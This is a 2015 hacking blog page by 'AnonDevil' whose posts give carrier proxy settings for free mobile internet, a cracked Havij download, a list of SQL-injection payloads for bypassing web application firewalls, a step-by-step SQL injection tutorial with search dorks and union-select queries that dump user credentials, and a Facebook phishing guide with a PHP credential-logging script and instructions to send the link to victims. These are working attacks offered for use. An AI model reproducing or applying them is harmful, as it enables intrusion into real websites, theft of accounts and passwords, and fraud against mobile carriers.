2015 ~ AnonDevil

Thursday, 2 April 2015

Free 3G Internet On Mobilink Jazz, Telenor And Ufone 2015

Today Our Topic Is Free 3G Internet On Mobilink Jazz, Telenor And Ufone 2015

By The Request Of Our Pakistani Friend's For Free of Charge Net, I Found Some Ways In Which For Free Of Charge Net For Pakistani Users. You'll Be Able To Use Free Net On Mobilink Jazz, Telenor And Ufone At 3G Speed..

First Of All Transfer This File And Install It On Your Mobile Transfer From Here Open That App ANd Do These Settings.

Download Here..

Free 3G Internet Mobilink Jazz Free Internet

Server Connection:=>

Your App Server: emso4.your-freedom.de

Connection Mode: DNS

Your App Port: 53

Proxy Settings:=>

Proxy Address: 0.facebook.com

Your Port: 80

How To Use Free Internet On Ufone

Server Connection:=>

Your App Server: m.facebook.com

Connection Mode: Https

Your App Port: 443

Proxy Settings:=>

Proxy Address: ems11.your-freedom.de

Your Posrt Port: 80

Go Back> Start> Click On Connection Minimize All APPS And Enjoy Free Internet

How To Use Free Internet On Telenor

Do These Settings On Your Mobile :)

Go To Mobile Settings > Configuration > Persnol Configuration Setting > Add New >

Go To Mobile Settings > More> Mobile Networks > Access Point Names > Telenor > Make New Point:

Access Point Name: Hamza

Apn ( Access Point Name): internet

Apn Type: default

Proxy Address 0.facebook.com

Your Posrt Port: 80

Click Save And Enjoy Free Telenore Internet

Comment If You Like This Article :)

Official Page: Xyb3r D3vil

Team: AnonDevilz

Havij 1.16 Pro Portable Cracked By Service Manual [ AoRE Team ]

By Unknown22:49Everything For Hacking, Website HackingNo comments

Download: Havij

How To Use:

COMEING SOON!!!!!

WAF = Web Application Firewall Bypass Using SQL Injection

By Unknown21:20Website HackingNo comments

Today I'am Going To Show You How To Bypass Web Application Firewalls (WAF),

Let's Begin!

How To Knw If There Is A Web Application Firewall?

This Is Pretty Simple! When you Try To Enter A Command Used For SQL Injections (Usually The "UNION SELECT" Command), You Get An 403 Error (And The Website Says "Forbidden" Or "Not Acceptable").

Example:

Code: http://www.site.com/index.php?page_id=-15 UNION SELECT 1,2,3,4,5....

(WE GET A 403 ERROR)

Basic/Simple Methods:

First, Ofcourse, We Need To Know The Basic Methods To Bypass WAF....

1)Comment's:

You Can Use Comment's To Bypass WAF:

Code: http://www.site.com/index.php?page_id=-15 /*!UNION*/ /*!SELECT 1,2,3,4,5...

(First Method That Can Bypass WAF)

However, Most WAF Identify This Method So They Still Show A "Forbidden Error"

2) Change The Case Of Latter's:

You Can Also Change The Case Of The Command:

Code: http://www.site.com/index.php?page_id=-15 UnIoN SeLEcT 1,2,3,4,5...

(Another Basic Method To Bypass WAF!)

However, As Before, This Trick Is Also Detected By Most WAF!

3)Combine The Previous Method's:

What You Can Also Do Is To Combine The Previous Two Method's:

Code: http://www.site.com/index.php?page_id=-15 /*!UnIoN*/ /*!SeLecT*/ 1,2,3,4,5....

This Method Is Not Detectable By Many Web Application Firewalls!

4)Replaced Keyword's:

Some Firewalls Remove The "UNION SELECT" Statement When It Is Found In The URL.. We Can Do This To Exploit This Function:

Code: http://www.site.com/index.php?page_id=-15 UNIunionON SELsectECT 1,2,3,4,5...

(The "Union" And The "Select" Will Be Removed, So The Final Result Will Be: "UNION SELECT")

This Method Doesn't Work On A: FIRWALLS, As Only Some Of Them Remove The "UNION" And The "SELECT" Command's When They Are Detected!

5)Inline Comment's

Some Firewalls Get Bypassed By Inserting Inline Comment's Between The "Union" And The "Select"

Command's:

Code: http://www.site.com/index.php?page_id=-15 UnION/**/SElecT 1,2,3,4,5..

(The U Is Equal To "U" And S To "S". See More On The Advanced Sectioons...)

I Believe That These Are The Most basic Method's To WAD Bypassing! Let's Move On More Advanced Ones...

Advanced Method's:

Now That You Have Learned About Basic WAF Bypassing. I Think It Is Good To Understand More Advanced Methods!

1) Buffer Overflow / Firewall Crash:

Many Firewalls Are Developed In C/C++ And We Can Crash Then Using Buffer Overflow!

Code: http://www.site.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn**/+/*!SeLECt*/+1,2,3,4,5....

( You Can Test If The WAF Can Be Crashed Typing:

?page_id=null

/**//*!50000UnIOn//*yoyu*/all/**/

/*!SeLEct*/

/*nna*/+1,2,3,4,5...

If You Get 500, You Can Exploit It Using Buffer Overflow Method!

2)Replace Characters With Their HEX Values

We Can Replace Some Characters With Their HEX (URL-Encoded) Values.

Example:

Code: http://www.site.com/index.php?page_id=-15 /*!union*/ /*!select*/ 1,2,3,4,5...

(Which Means "UNION SELECT")

Text To Hex Encoder (Choose The "Hec Encoded For URL"

Result!): http://www.swingnote.com/tools/texttohex.php

3) Use Other Variables Commands Instead Of The Common Ones For SQLi:

Apart From The "UNION SELECT" Other Commands Might Be Blocked.

Common Commands Blocked

Code:

COMMAND | WHAT TO USE INSTEAD

@@version | version()

concat() | concat_ws() --> Difference Between Concat() And concat_ws(): http://is.gdVEeiDU

group_concat() | concat_ws()

[!]-> You Can Also Try To SQL Inject With The NAME_CONST Method: http://is.gd/o10i0d (Created By DOWNFALL)

Learning MySQL Really Helps On Such Issues!

4) Misc Exploitable Functions:

Many Firewalls Try To Offer More Protection By Adding Prototype Or Strange Functions! (Which, Ofcource, We Can Exploit!):

Example:

The Firewall Below Replaces "*" (ASTERISKS) With Whitespaces! What We Can Do Is This:

Code: http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4,5....

(If The Firewall Removes The "*", The Result Will Be: 15+union+select...)

So If You Find Such A Sily Function, You Can Exploit It, In This Way!

[+]In Addition To The Previous Example, Some Other Bypasses Might Be:

Code:

-15+(uNioN+(sElECt)...

-15+uNioN+SeleCT)+...

-15+(UnI(oN)+(SeL)(ecT)+..

-15+union (select 1,2,3,4,5...

-15+/*!50000UNION*/+SELECT+1,2,3,4,5...

Team: AnonDevilz

Member/Hacker: Xyb3r D3vil

How To Hack A Website Using SQL Injection - A Step By Step Tutorial

By Unknown19:55Website HackingNo comments

How To Hack A Website Using SQL Injection - A Step By Step Tutorial

SQL Injection Is A Code Injection Technique That Exploits A Security Vulnerability Occurring In The Database Layer Of An Application. The Vulnerability Is Present When User Input Is Either Incorrectly Filtered For String Literal Escape Characters Embedded In SqQL Statements Or User Input Is Not Strongly Typed And Thereby Unexpectedly Executed. It Is An Instance Od A More General Class Of Culnerabilities Another SQL Injection Attacks Are Also Known As SQL Insertion Attacks.

Step-By-Step Tutorial For SQL Injection

Step 1 Find A Website That Is Vulnerable To The Attack. This Is The First Step In SQLi And Like Every Other Hack Attack Is The Most Time Consuming Step. Once You Get Through This, Rest Is A Cake-walk Now, Let Us All Know What Kind Of Pages Are Vulnerable To This Attack. We Are Providing You With A Few Dorks (Google Strings To Find Vulnerable Sites). Though At The End Of This Post, We'll Provide A List Of Vulnerable Sites.

Dorks:

accinfo.php?cartId=

        acclogin.php?cartID=
        add.php?bookid=
        add_cart.php?num=
        addcart.php?
        addItem.php
        add-to-cart.php?ID=
        addToCart.php?idProduct=
        addtomylist.php?ProdId=
        adminEditProductFields.php?intProdID=
        advSearch_h.php?idCategory=
        affiliate.php?ID=
        affiliate-agreement.cfm?storeid=
        affiliates.php?id=
        ancillary.php?ID=
        archive.php?id=
        article.php?id=
        phpx?PageID
        basket.php?id=
        Book.php?bookID=
        book_list.php?bookid=
        book_view.php?bookid=
        BookDetails.php?ID=
        browse.php?catid=
        browse_item_details.php
        Browse_Item_Details.php?Store_Id=
        buy.php?
        buy.php?bookid=
        bycategory.php?id=
        cardinfo.php?card=
        cart.php?action=
        cart.php?cart_id=
        cart.php?id=
        cart_additem.php?id=
        cart_validate.php?id=
        cartadd.php?id=
        cat.php?iCat=
        catalog.php
        catalog.php?CatalogID=
        catalog_item.php?ID=
        catalog_main.php?catid=
        category.php
        category.php?catid=
        category_list.php?id=
        categorydisplay.php?catid=
        checkout.php?cartid=
        checkout.php?UserID=
        checkout_confirmed.php?order_id=
        checkout1.php?cartid=
        comersus_listCategoriesAndProducts.php?idCategory=
        comersus_optEmailToFriendForm.php?idProduct=
        comersus_optReviewReadExec.php?idProduct=
        comersus_viewItem.php?idProduct=
        comments_form.php?ID=
        contact.php?cartId=
        content.php?id=
        customerService.php?****ID1=
        default.php?catID=
        description.php?bookid=
        details.php?BookID=
        details.php?Press_Release_ID=
        details.php?Product_ID=
        details.php?Service_ID=
        display_item.php?id=
        displayproducts.php
        downloadTrial.php?intProdID=
        emailproduct.php?itemid=
        emailToFriend.php?idProduct=
        events.php?ID=
        faq.php?cartID=
        faq_list.php?id=
        faqs.php?id=
        feedback.php?title=
        freedownload.php?bookid=
        fullDisplay.php?item=
        getbook.php?bookid=
        GetItems.php?itemid=
        giftDetail.php?id=
        help.php?CartId=
        home.php?id=
        index.php?cart=
        index.php?cartID=
        index.php?ID=
        info.php?ID=
        item.php?eid=
        item.php?item_id=
        item.php?itemid=
        item.php?model=
        item.php?prodtype=
        item.php?shopcd=
        item_details.php?catid=
        item_list.php?maingroup
        item_show.php?code_no=
        itemDesc.php?CartId=
        itemdetail.php?item=
        itemdetails.php?catalogid=
        learnmore.php?cartID=
        links.php?catid=
        list.php?bookid=
        List.php?CatID=
        listcategoriesandproducts.php?idCategory=
        modline.php?id=
        myaccount.php?catid=
        news.php?id=
        order.php?BookID=
        order.php?id=
        order.php?item_ID=
        OrderForm.php?Cart=
        page.php?PartID=
        payment.php?CartID=
        pdetail.php?item_id=
        powersearch.php?CartId=
        price.php
        privacy.php?cartID=
        prodbycat.php?intCatalogID=
        prodetails.php?prodid=
        prodlist.php?catid=
        product.php?bookID=
        product.php?intProdID=
        product_info.php?item_id=
        productDetails.php?idProduct=
        productDisplay.php
        productinfo.php?item=
        productlist.php?ViewType=Category&CategoryID=
        productpage.php
        products.php?ID=

And You Can Also Write Your Own.

And Download SQL Websites From Here

How To Check If A Website Is Vulnerable To This Attack?
Once You Execute The Dorks And Get The Preferred Search Results. Say For Example
http://www.website.com/index.php?catid=1

Add A '(APOS) At The End Of The URL. Such That URL Looks Like
http://www.website.com/index.php?catid=1'

If The Page Returns An SQL Error, The Page Is Vulnerable To SQLi. If It Loads Normally, Leave The Page And Move On To The Next Site In The Search Result.

Typical Errors You'll Get After Appending The Apostrophe Are:
Warning:mysql_fetch_array():
Warning:mysql_fetch_assoc():
Warning:mysql_fetch_numrows():
Warning:mysql_fetch_num_rows():
Warning:mysql_fetch_result():
Warning:mysql_fetch_preg_match():

Step 2: Once You Find A Vulnerable Site, You Need To Enumerate The Number Of Columns And Thos Columns That Are Accepting The Quries From You.

Append And 'order by' Statement To The URL.
eg. http://www.website.com.index.php?catid=1 order by 1

Continue Increasing The Number After Order By Till You Get An Error. So The Highest Number For Which You Do Not Get An Errir Is The Number Of Column In The Table. Now To Know The Column NumbersWhich Are Accepting The Queries.

Append An 'Union Select' Statement To The URL. ALso Precede The Number After "id=" With A Hyphen Or Minus.
Say From The Above Step, You Got That The Table Has 6 Columns.
Eg. http://www.website.com/index.php?catid=-1 union select 1,2,3,4,5,6

Result Of This Query Will Be The Column Numbers That Are Accepting The Queris. Say We Get 2,3,4 As The Result. Now We'll Inject Our SQL Statements In Onw Of Thease Columns.

Step 3: Enumerating The SQL Version
We'll Use The Mysql Command @@version() To Get The Version Of The DB. We Have To Inject The Command In One Of The Open Columns. Say We Use Columns Number 2.

eg. http://www.website.com/index.php?catid=-1 union select 1,@@version,3,4,5,6

You'll Get The Version Of The Database Is The Place Where You Had Got The Number 2. If The Startiing Of The Version Number Is 5 Or More, Then You Are Good To Go. If Less Move On To Another Site.

Step 4: Exploit
To Get List Of Databases:
http://www.website.com/index.php?catid=-1 union select 1,group_concat(schema_name)3,4,5,6 from information_schema.schemata--

Result Will Display A List Of Databases On The Site. Here On, We'll Write The Results We Have Gor From Our Test.

Result: information_schema, vrk_mlm

To Know The Current Databse In Use:
http://www.website.com/index.php?catid=-1 union select 1,concat(databse()),3,4,5,6--
Result: vrk_mlm

To Get The Current User:
http://www.website.com/index.php?catid=-1 union select 1,concat(user()),3,4,5,6--
Result: vrk_4mlm@localhost

To Get The Tables:
http://www.website.com/index.php?catid=-1 union select 1,group_concat(table_name)3,4,5,6 from information_schema.tables where table_schema=database()--
Result: administrator,category,product,users

We'll Concentrate Our Attack On The Users Table.

To Get The Columns:
http://www.website.com/index.php?catid=-1 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_Schema=database()--
Result: admin_id,user_name,password,user_type,status,catID,catName,prodId,catID,prodName,prodDesc,prodKeyword,prodPrice,prodPrice,prodImage,id,incredible_id,f_name,m_name,l_name,refered_by_id,refered_direct_to_ids,refered_toids,no_of_direct_reterals,credits,position,email_id,password,editied_on,last_login,created_on,chain_number,phone,address

By Looking At The Columns Closely, And The Order Of The Tables, We Can Conclude That Starting From if,incredible_id Are The Columns Belonging To THe Users Table And We Are Intrested In That.

Extract Information:
union select group_concat(id,ox3a,incredible_od,ox3a,f_name,ox3a,m_name,ox3a,l_name,ox3a,refered_by_idox3a,refered_direct_to_ids,ox3a) from vrk_mlm.users--

Now You Will Get The Admin User Name And Password....

Team: AnonDevilz

Member/Hacker: Xyb3r D3vil

How To Hack Facebook Account Using Phishing

By Unknown00:09Facebook HackingNo comments

How To Hack Facebook Account Using Phishing Page (Fake Page)

Steps To Creat Phishing Page:

1. Go To The Facebook Page , And Then Right Click On The Page, You Will See The Option VIEW SOURCE PAGE , Click On That.

2. Now A New Tab Will Open Which Contaun A Source Code, Select All The Stuff And Paste It In A Notepad.

3. Now Open The Notepad And Press CTRL + F, And Type ACTION.

4. You Will Have To Find A Text Which Looks Like...

action="https://www.facebook.com/login.php?login attempt=1"

5. Now Change The Text To post.php. Then It Will Look Like...

action="post.php"

6.Now Save It On your Desktop Woth the Name index.htm , Not index.html ,Remember.

7. Now Your Phishing Page Is Ready. It Will Look Like A Facebook Login Page.

8. Open A New Notepad And Save The Given Data With The Name post.php

<?php

header ('Location:http://www.facebook.com/');

$handle = fopen("username.txt","a");

foreach($_POST as $variable => $value) {

fwrite)handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");

}

fwrite($handle, "\r\n");

fclose($handle);

exit;

9. You Have 2 Files Now One Is index.htm And Another Is post.php , Remember File Extension Is Important.

10. Now You Have To Upload It In A WEB HOSTING Site , I Prefer You To Use 000webhosting or else My3gb.

11. I Prefer You To Use 000webhost Because It Will Be Easy To Use.

12. You Have To Make A Account In That.

13. Now Go CONTROL PANEL , Then On FILE MANAGER .

14. After That A New Window Will Pop-up, Now Go To public_html .

15. Delete The File Named Default.php , After That Upload 2 Files index.htm And post.php One By One.

16. Now The Last Step Click On View Of index.htm It Will Look Same As Facebook Page.

17. Copy The URL Of That Page And Send this Link To Your Victim, When Your Victim Try To Log In To It With The Username And Password. The Page Redirectly Connect To Facebook. And You Will Be Now Able To See His Password.

18. Open Your 000webhost Account And Go To File Manager Then Public_html , Here You Find A New File Named username.txt

19. Click On View Now You Will Have Your Friend's Password And Email Id.

You Can Download Phishing Script's From This Download Link: 34 In 1 Mega Pack Of Phishing

Hacker: Xyb3r D3vil

Team: AnonDevilz

Comment If You Face Any Problem...